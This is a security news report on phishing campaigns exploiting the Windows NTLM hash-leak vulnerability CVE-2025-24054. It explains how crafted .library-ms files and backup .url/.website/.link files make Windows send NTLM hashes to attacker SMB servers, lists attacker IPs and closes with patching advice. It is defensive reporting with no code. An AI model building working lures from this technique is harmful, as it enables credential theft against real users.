A recently identified vulnerability in Windows, designated as CVE-2025-24054, has come under active exploitation by cybercriminals, particularly in phishing campaigns aimed at both government bodies and private enterprises. Initially addressed in Microsoft’s March 2025 Patch Tuesday, this flaw was not classified as actively exploited at the time of its release, with assessments suggesting a ‘less likely’ probability of misuse.
However, researchers from Check Point have reported a surge in exploitation activities shortly after the patches were made available, with notable incidents occurring between March 20 and 25, 2025. While one of the IP addresses involved in these attacks has been previously associated with the Russian state-sponsored threat group APT28, the evidence remains insufficient for definitive attribution.
Exposing NTLM hashes
The NTLM (New Technology LAN Manager) protocol, utilized by Microsoft for authentication, employs a challenge-response mechanism that relies on hashes rather than transmitting plaintext passwords. Despite its design to enhance security, NTLM is increasingly viewed as outdated, vulnerable to replay attacks and brute-force cracking of captured hashes. In response, Microsoft is gradually transitioning away from NTLM in favor of more secure alternatives like Kerberos or Negotiate.
In the phishing attacks documented by Check Point, emails were dispatched to targets in Poland and Romania, featuring a Dropbox link that led to a ZIP archive containing a .library-ms file. This file type, typically used to display a Windows library—a virtual container aggregating files and folders from various sources—was manipulated to direct users to a remote SMB server controlled by the attackers.
Source: Check Point
Upon extraction of the ZIP file, Windows Explorer automatically interacts with the .library-ms file, inadvertently triggering the CVE-2025-24054 vulnerability. This action prompts Windows to establish an SMB connection to the specified URL, during which it attempts NTLM authentication, allowing attackers to capture the user’s NTLM hashes.
In a subsequent wave of attacks, Check Point identified phishing emails that included .library-ms attachments without the need for a ZIP archive. Merely downloading the .library-ms file was sufficient to initiate NTLM authentication to the remote server, underscoring the ease with which this vulnerability can be exploited.
“On March 25, 2025, Check Point Research discovered a campaign targeting companies around the world, distributing these files without being zipped,” noted Check Point. “According to Microsoft, this exploit is triggered with minimal user interaction with a malicious file, such as selecting (single-clicking), inspecting (right-clicking), or performing any action other than opening or executing the file.”
The malicious archive also contained three additional files—’xd.url,’ ‘xd.website,’ and ‘xd.link’—which exploit older NTLM hash leak vulnerabilities, likely included as a backup in case the primary library-ms method fails. The attacker-controlled SMB servers involved in this campaign were traced to the IP addresses 159.196.128[.]120 and 194.127.179[.]157.
While CVE-2025-24054 is rated as a “medium” severity issue, the implications of capturing NTLM hashes can lead to authentication bypass and privilege escalation, making it a significant concern. Given the minimal user interaction required for exploitation, organizations are urged to treat this vulnerability as high-risk. It is recommended that all entities promptly install the March 2025 updates and disable NTLM authentication if it is not essential to their operations.
